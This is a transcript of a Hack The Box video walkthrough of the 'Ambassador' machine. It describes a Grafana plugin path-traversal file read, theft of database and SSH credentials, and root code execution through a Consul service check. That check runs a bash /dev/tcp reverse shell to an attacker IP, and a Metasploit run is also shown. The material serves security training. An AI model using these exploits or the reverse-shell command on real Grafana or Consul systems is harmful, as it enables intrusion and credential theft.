What's going on YouTube? This is Ipsec, me doing Ambassador from HackTheBox, which starts out with exploiting a LFI against Grafana. And now Grafana is configured to use SQLite, and my favorite thing about LFIs on SQLite web apps is you can just export the entire database since it's a single file. So with access to the SQLite database, you can find MySQL creds, log into MySQL, get SSH creds, and then with SSH on the box, you discover there is another web app listening internally called Consul, which is kind of like a network automation type thing, but you just get the API key from Consul. You can create a check much like how we exploit Zabbix or Nagios. And with that check, you get code execution on the box as root. So with all that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it ambassador, and then the IP address of 10.10.11.183. This can take some time to run, so I've already ran it. Looking at the results, we have just 4 ports open, the first one being SSH on port 22. Its bandit tells us it's an Ubuntu server. We also have HTTP on port 80. It's running Apache HTTPD. It's also on Ubuntu. And for the HTTP generator, we have Hugo 0.94.2. And Hugo is like a static website development framework. So there's not going to be any dynamic content here. We can just Google Hugo and see exactly what it is. It's a framework for building websites. Trying to think the other popular one, static webs. Well, we can probably just go to Google and do Hugo versus and see what the other common one is. So Google, let's do Hugo vs. Jekyll is the other super common static website builder. So that's that. And then on port 3000, we have, looks like another web server since we have this 404 request. Nmap is just not identifying it as one. We also have it redirecting to a cookie. And let's see, is there anything that sticks out here? I'm not exactly sure. But the very last port we have is MySQL on port 3306. And it tells us it's running Ubuntu as well. So with everything saying Ubuntu, I'm relatively confident there's no like Docker containers or anything like that. There still could be. We could like fingerprint to get the Ubuntu version out of each of these, but it's not that important. So let's just move on and take a look at the website. So 10.10.11.183, and we get the Ambassador development server. As I had already said, we know this is Hugo. So if I looked at Control U, we wouldn't expect to see like WordPress or anything like that. It's just a static website. It is kind of telling us what this server is. So when you start out as a developer ambassador, you'll be assigned a development server, and you can connect to it with SSH. It's not really that interesting here. If we click read more, it still tells us to SSH as developer. And based upon the post, it's not doing any type of parameter here, so I'm not even going to try SQL injection. And yet again, I think this is built with Hugo, so it's a static website that doesn't accept parameters anyways. I'm going to check out port 3000 to see exactly what that was. And it is loading Grafana. And looking at the very bottom, we have a version here. So whenever I see a version, I always like checking out how old it is, right? So let's do 820 in Google. And we got release notes. Release notes are really good for finding dates. And this one doesn't look like it's going to tell us the date. Let's see. We could look at this GitHub issue that's linked here. Maybe that will tell us. If we go to the page source, don't see anything here. There's probably something in the metadata or something, because normally whenever a blog post is there, they have some type of date, right? This is September 2nd, 2021. This is 2021 as well. So I'm going to guess 8.2 is released around 2021. So let's see. The other thing we could do is like Google something like this and then add RPM. And then go to like the index to find out exactly when this was built. and we still have 30 September 2021. So I'm going to guess this is about 2 years old at this date. So there may be exploits available for it. So I'm going to do search exploit Grafana. And we see this 8.3.0 and 8.2.0 is less than 3. So this is probably going to be the one we want to do. Search exploit-x to examine it. And we can see it looks like it is a Python exploit. Well, it's coded in Python. And all it's trying to do is go to the host, go to /public/plugins, go to the plugin, and then a bunch of // and a file to read. So we could execute this script, or we could just do it manually, right? So if I try to go to 1010, where was it? Right here. So if we go to, what was it? Plugin, public plugins. And then we put something random here, and then try a bunch of // Etsy, passwd, and I'm actually going to want to copy and paste this because I want to do this in Burp Suite, because I think by default Firefox is going to normalize this URL and get rid of the // Yeah. So let's do this in Burp Suite. Send it there, make sure repeater is on, refresh, paste this, and we get plugin not found. So it looks like it needs a plugin here. So what I'm going to do is look at the available plugins, and let's see. There is a MySQL plugin. That's going to be the one I test for first. I guess we can try stat, see if like a bunch of them work. But since we had MySQL exposed on nmap, that's the one I'd probably start with, and stat also works. So maybe almost any of these plugins works. Let's try Jaeger. Yeah. So it doesn't really matter what plugin we use. The LFI is going to work. MySQL as well. So now we have the passwd file. The first thing I want to test for is just what this happens if I give it a directory. So if I just give it Etsy, we get a 200 OK. If it was coded like in Java or something, chances are we'd see the output like an ls, because in Java, if you open a directory, it behaves like a file with the contents being the files in the directory. I think that's kind of unique to Java, though. If we give it a directory that doesn't exist, let's see what we get. We get a 404 not found. So we can, while we can't enumerate the contents of a directory, we can enumerate if the directory itself does exist. But what I'm going to do is go over to Google, and we're going to search Grafana installation guide, because whenever I have an LFI in some type of application, I generally like seeing how it's installed, because that's going to be where all the sensitive files are. So let's Grafana installation guide. So we have the Grafana documentation, and let's see. There is a supported operating system, Debian and Ubuntu. So that's the one I'm going to go with, because we know this box is definitely Ubuntu. And then scrolling around to see exactly what we do, that's installing apt, installing binaries, starting the server. And then we have some important scripts. So there is a Etsy Grafana, grafana.ini, which is the configuration file. So let's take a look at this. So go back to Burp Suite, and we can paste that here, and we get the Grafana configuration. So I'm going to send this to a file, and we're going to call this grafana.ini. And the main reason I'm doing that is just so I can open it up, or cat it, I guess, because I want to get rid of comments. Because often when I look at configuration files, it's loaded with tons of comments. So I'm going to do grep-v and then say anything that begins with a pound sign. And we can also do a \pipe to do an or, and anything that begins with a semicolon as well. And then we do a second grep for period, which just means grab everything that's not empty line. And here we have it. So I'm going to guess all these are plugins, maybe? I don't know. We have an admin password right here. I'm not sure why it grabbed those empty lines. But really, the only thing non-unique it looks like is that admin password. So I'm going to open this up in Vim to see if there's anything around the security. So if we look at security, it's just that. So I'm going to try logging in. So we can go back to Grafana, log in with admin and the password. I'm doing admin because it says admin user admin, and it's commented out, but I mean, I guess we didn't want to change the default. And it does let us into Grafana. So now the thing I want to look at is the actual database, because there's probably MySQL creds there. We could try just logging in to MySQL. So like, let's do MySQL -u. I'll try Grafana -p and then -h 10 10 11 183. Lowercase p is just for password. And I don't know if that was still on my clipboard. It didn't give me like masking characters, so I don't know if I did the correct thing. Okay, let's paste it. And let's see, is it going to say access denied? It definitely takes a while. I guess it's probably doing some type of reverse DNS lookup or something. We could try root. That's another common MySQL user, but doesn't look like we're getting anything there. So if we look at Grafana, we can see the plugins, MySQL. It doesn't look like it lets us configure it here. We could go to Google, but data sources is another place we can generally edit things. We have a mysql.yaml, and the password is blanked out. So it doesn't look like we get the password here. We could intercept this request in Burp Suite, and maybe it's just like not displaying the password to us. I find that to be somewhat common. So let's see, the username. We can search for Grafana. This is probably going to give us a lot of junk. Yeah, 84 matches. Wow. Password. So password hint. I don't really see anything here. But I'm going to save this request. So when we do find the password, we can just look for it, right? MySQL config. We keep going down the list of packages. We can see it by default, it uses SQLite 3, which is just a single file that's a database. So we could try grabbing this. So I'm going to go back to the LFI. We can rename this tab. If you just double click where it says the numbers, you can actually rename those tabs, which comes in really handy. So let's try getting the Grafana DB, and we do. So I'm just going to copy the file. I'm going to call this grafana.db. And then we're going to edit this. And it's SQLite 3. I'm just going to remove these headers, the 8 web headers. And now if I do a file on this, we have it as an SQLite database. So I'm going to do SQLite 3, grafana.db, and do .schema to get what tables there are. And I'm just going to search backwards for password. And there is a table called data source. And it looks like it has password, URL, user, and database. So I'm going to try getting user password database. So select user password database from, I think, data source. Yeah, we got it. So Grafana, the password is don't stand too close to me, and the database is Grafana as well. So I'm just going to go back here, and this is important to do when you're doing any type of testing. Like, even though you didn't find anything here, it's always important to revisit it once you know what you are looking for to see if it shows. And it doesn't show us the password, so I don't think it's there. But now we can try logging in. The user was Grafana. So let's exit this SQLite. Quit. exit, quit, Control Z, pkill SQLite 3. I don't know exactly how to exit SQLite, I learned. I think that's out now, right? Nope, it's still there. Let's foreground it, and now it's terminated. Okay. So what was I looking for? Logging in. So MySQL username was Grafana. And I want to say that password had an exclamation point at the end of it. So let's try logging in. I didn't specify the database. It should let me in anyways. Yep. Show databases. And we have Grafana, so we could use... That's weird. It has MySQL and SQLite. Well, nothing's in this database. There is a WhackyWidget. I don't know what that is. So if I go to WhackyWidget, show tables, there is users. So we can select star from users. And then MySQL, I like using \G because it makes it more human readable. So we can see the table name and column there. If you just do the standard semicolon, it does it like this. But if there's a lot of tables, then it like overfills and it just becomes a pain to read. So that's why I like the /G to put each column on one row. And normally when I do that, I do like limit 1 to see just one entry. Because if there's like 1,000 users in this, you'll have the same problem. But we have this string, definitely base64 encoded. So let's echo -n, base64-d, and the password is an Englishman in New York. So, and the username is developer. And based upon the website having so many hints at SSHing with a developer account, let's just try SSH, 10.10.11.183. Put the password in, and we get logged in. So now that we have a shell on the box, so let's do a ls and see what files we have. It looks like there is a git config, which stands out. We also have the user.txt and then a bunch of these types of directories. I don't know exactly what's in them, so I can do a find -type f and just take a look. I'm going to do less with a capital S. And looks like virtual environment and pip stuff. We have an LXD thing. So I'm just going to do groups to see if we're a member of LXD, because if we were, the privesc would be super easy. So we don't really have too much. Let's take a look at that .git config. And there is a directory called /opt/myapt. So let's take a look. So if we do here, there's a directory called Consul. We look at it. I don't know exactly what that is. If we go to myapp, we have environment and WhackyWidget. So let's look at this. And there is a file for put config in Consul. So at this point, we should probably Google what Consul is, because we see 2 references to it right away. Let's turn Burp Suite off. Consul. And it looks like it's some software. It automates network configurations, right? So we could do a search exploit on Consul to see what is there. Probably should do it on our actual machine, not the SSH session. And I see these, so it looks like it is Metasploit. So we have RCE via RExec and Services API. Let's just take a look at this one. I'm doing this one just because it's slightly newer. There's just one number off, so they're pretty much the same time. But we can look at it, and we probably should have looked at it in Metasploit, right? So let's do MSF console. It's been so long since I used this. Actually, we do MSF DB start. Let's sudo it. It's already started. Maybe we do run. There we go. And then I can just search for Consul once this loads up. So we search for it. We can use Let's do 6, show options, to see what type of things we need. Is this going to be an authenticated thing or not? And it looks like we need a ACL token. And don't worry, I'm not going to use Metasploit to exploit it. Maybe at the end we can just port forward, but I don't find it too interesting. Just putting everything in, we'll look at exactly what the script does and do it manually. But just showing how I go finding out that it is indeed vulnerable. So we need some type of token, right? And looking at this, it looks like it may be using the MySQL password as the token. So what was the MySQL password? Let's see. How do we find that? Oh, it was in this, right? Data source, LFI. Yeah. I should have taken notes, but let's do SQLite3, grafana.db, and then select password from data source. And here's the SQL password. So let's see. I'm going to do Consul API documentation to see exactly how to use the API. And it looks like we can, let's check health, right? So it makes a request. Let's see, header namespace v1 health node my node. And we don't even know what port it's on. Is this telling us 8500? grep 8500. It is listening localhost only. So curl localhost 8500, and then v1 health node my node. We just get a blank array. Missing node self. I don't know exactly what data we should be getting. Maybe we need this -- header. So this is for enterprise, and I guess we are not on enterprise. We could go back to the Metasploit plugin. So let's do searchploit, Metasploit, or not Metasploit, Consul. And I'm going to do a -m to mirror. And we just want to get this one. And I'm actually going to look at the source code because I want to see what Metasploit does with this. So I'm going to search for v1. And it looks like it gets v1 agent self. So let's try this. v1 agent self, permission denied. That's what we wanted to see. So how does Metasploit use this token? So it looks like ACL token. And it puts it in the header xconsole-token. So xconsole-token. And we put the password, don't stand too close to me, in this. And we have ACL not found. I'm going to prepend that or append that with an echo, so we just get the results. So it doesn't look like that is the token. If we do a git log, we do have this latest commit tidy config script, and then this one of just config script. So let's look at what it looks like here. So git log this, and if we add a -p, or let's see, git log, okay, add the -p there, and we can see the changes. So we have wacky config, put config in console, and it actually has this as the token. So let's try the exact same thing we had as curl. And now put this as the token, and we get a lot of data back. So let's copy this. And we can just kind of view the data if we wanted to. So we could view agent self API. I don't know. and paste, cat this with JQ, and we get a pretty print. And it just goes with like the whole console configuration thing, right? So now we should have enough data where we can look at the Metasploit script and just repiece what it does. So at first, it's looking for enable script check, or debug config, or enable remote script check. So it wants one of these to be true. So we can just look at our thing and go for enable script. Let's see. If we look at check, discard, is it script? Yeah, enable local script check and remote script is true. So in Metasploit, we would pass that, and that wants to execute command. So we go v1 agent service register, and then it makes this into JSON. So I'm going to less this because I find it just easier to copy from less. We're going to make this JSON data. So let's copy this. V payload.json. Actually, I'm going to do it on this host because we're not using tunnels. So let's just go dev shm payload.json. Set mode to paste. Paste it in. And let's see. So this is going to be ID. And then service name. This can be please subscribe. And the next thing is name. Then we want address. We can leave this at 127.0.0.1. Port. And this looks like an integer, so no quotes. And then check. And this looks like it is nested JSON. Script. CMD. So this can be the command we want to run probably. --i dev tcp 10.10.14.8 9001 like that. And then args. I wonder if that's like the name of the script. So let's see. Bin bash -c dev tcp, same thing. --i dev tcp 10.10.14.8 9001. Okay. Then we need interval 10 seconds and timeout 86 400 seconds. Close that and close that. So I think we have valid JSON here. We could copy this and then go to a new pane, v test.json, paste it in, JQ or cat test, JQ dot, parse error, line 9. I don't know why it got a parse error here. Interval, colon, we did not close that off, right? Yep. So always, when you create payloads or handwrite JSON, test it out to make sure it's valid. There we go. So now I can go back to our curl. And instead of doing v1 agent self, it made the request to, I want to say like register or something. Let's see. v46074 v1. So v1 agent service register. So service register. And then what did it do with this? It just uploads the JSON. So let's nc lvmp 9001, make sure we have something on. And I'm going to do this with a -- data. And then we can just do payload.json, the file. And if you do this it's going to include the file. And then we also have to make this a put request. So let's see what it says. It's probably going to error out, right? Unknown field script in this. So it did not like script. That's odd. Agent service register. Is that what I said? Agent service register. Yes, I did. I guess we could try removing that. Do this again. It didn't error, which is interesting. But we do not have the shell. Oh, there we go. Probably because the timeout interval is set to 10 seconds. So there we have it. Now we have the shell as root, and we could get in this way, right? And if we really wanted to simplify the box, right, it should do this again. I just canceled it out, but we could have just at this point used Metasploit. So if we wanted to use Metasploit for this, all we have to do is establish a tunnel. So on the very first line, I'm going to do squiggly C. So I'm going to hit enter, squiggle C. We get this SSH prompt, and I can forward 8500 to localhost 8500. And what this does is now I can, by curl localhost 8500, we get fail to connect, hit enter up here, and now port 8500 is going through that SSH connection going to the other end, right? So now if we do MSF, let's do MSF DB run. We can now use Consul to get a shell this way, right? So that's forwarding, search, Consul, use 6, show options, set, let's see, our host 127.0.0.1, ACL token we'll probably need to set, and I guess serve host, set serve host 10.10.14.8, set ACL token, go back to this curl request, and we want to grab the Consul token. I just put a bunch of spaces, so this is just on one line. So options, what are we missing? Set L host 10.10.14.8. I think that may be all we need to do. Run. Waiting for service to trigger, sending the stage, and we have Meterpreter session 1 opened. So that's how much easier it is to just use Metasploit with this. You don't have to figure out the whole curl payload or things like that, right? So we can do shell, ID, and do it that way. There's also something somewhat interesting on the box. If you didn't do it either of those ways, if you're looking at like writable things by the group, so if we do find /-group developer and then -writable, I'm not going to do ls because it'll just take a lot of output. We should pipe errors to dev null, so those don't flood us. And we can see we can write to the Consul config directory. There's also var/dub HTML and backups and things like that. I don't know what's in those. HTML, cat backups. It's a directory. Of course it is. It looks like it's blank. So I don't know exactly what that's for. But If we do etc console.d, there is this config.d, and we can actually write in there. We don't have the, let's see, RWX. Yeah, we don't have the read permission, so we can't ls inside of this config directory, which is weird. But we have write, so we can write into it, and we have execute, so we can navigate into it. There is this console.hcl file, and if I look at it, we can see, let's see, I think we could just write our script this way. I did not do the box this way, so I'm still trying to figure out exactly how it works. Let's see. Let's just go in config.d, v, execute.hcl. And I think we just do like check is equal to, and then the JSON we pretty much created for the service. So you can do args is equal to user bin touch. I'm not going to get a shell here. We're just going to prove this works. We'll create the file, please subscribe. And then let's do interval is equal to 5 seconds, I guess. Like this. We probably need to give it a ID. Please subscribe. There we go. So I think this is all we need. And then we can restart console. So console reload. And we need to give it the token, because we can see like this is a nulled out token right there. So what we want to do is, let's see, console-h. I want to say there's a way to pass it a token. Let's go opt. I hope this directory doesn't get cleared out. If we do ls/temp, we see my file does not exist yet. But let's go opt my app WhackyWidget. How is it using this? Let's see. Create a project. Console kv put. I think we just do -- token. So where is the reload command? There we go. Configuration reload triggered. So now if we look at temp, we do have please subscribe being written. So that is another way you could do the box. I don't really like it this way just because it requires a shell in the box. I like doing everything over remote connections when possible because I think that's more realistic. But hopefully you enjoyed seeing it both ways. And that will be the video. Take care, and I'll see you all next time.